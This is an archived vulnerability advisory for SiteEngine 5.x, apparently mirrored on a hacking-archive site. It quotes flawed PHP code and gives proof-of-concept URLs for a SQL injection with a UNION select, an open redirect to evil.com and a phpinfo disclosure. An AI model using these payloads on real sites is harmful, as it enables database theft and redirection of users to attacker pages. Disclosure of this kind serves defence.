AOH :: HP Unsorted S :: VA1632.HTM

SiteEngine 5.x Multiple Remote Vulnerabilities



SiteEngine 5.x Multiple Remote Vulnerabilities
SiteEngine 5.x Multiple Remote Vulnerabilities



Due to incorrect use of intval function, leading to the logic of inspection parameters can be bypassed, resulting in SQL injection vulnerability.

-=0x01=- SQL injection Vulnerability
vul code like this:
if ( intval( $id ) )
{
    require_once( $site_engine_root."lib/rss.php" );
$sql = "SELECT url FROM ".$tablepre."feed WHERE id={$id} AND uploader='{$SESSION['uid']}'";

POC:
http://www.test.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,1 
1%20/*
This vulnerability exist in board.php=85=85

-=0x02=- URI Redirection Vulnerability 
POC:
http://www.test.com/api.php?action=logout&forward=http://evil.com 

-=0x02=- Information Disclosure Vulnerability 
POC:
http://www.test.com/misc.php?action=php_info 

ForFun~

-=EOF=-

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.